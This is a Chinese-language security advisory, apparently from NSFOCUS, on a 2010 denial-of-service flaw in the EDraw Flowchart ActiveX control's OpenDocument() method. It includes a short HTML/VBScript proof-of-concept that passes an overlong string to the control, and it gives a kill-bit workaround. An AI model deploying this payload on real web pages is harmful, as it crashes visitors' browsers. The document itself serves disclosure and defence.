安全研究

安全漏洞
EDraw Flowchart ActiveX控件OpenDocument()方式远程拒绝服务漏洞

发布日期:2010-04-22
更新日期:2010-04-26

受影响系统:
EDraw Flowchart ActiveX 2.3.0.6
描述:
BUGTRAQ  ID: 39641

EDraw Flowchart是EDraw Office查看器组件中的流程图工具。

EDraw Flowchart ActiveX控件(EDImage.OCX)的OpenDocument()函数在解析超长字节时存在拒绝服务漏洞,用户受骗访问了恶意网页并向该函数传送了超长参数便可能导致浏览器崩溃。

<*来源:Gjoko Krstic (liquidworm@gmail.com
  
  链接:http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />  

<script language='vbscript'>  

  

targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"  

prototype  = "Function OpenDocument ( ByVal filename As String ) As Boolean"  

memberName = "OpenDocument"  

progid     = "EDIMAGELib.EDImage"  

argCount   = 1  

  

arg1=String(4444, "J")  

  

thricer.OpenDocument arg1  

  

</script>

建议:
临时解决方法:

* 为clsid F685AFD8-A5CC-410E-98E4-BAA1C559BA61设置kill bit。

厂商补丁:

EDraw
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ocxt.com/

浏览次数:2162
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障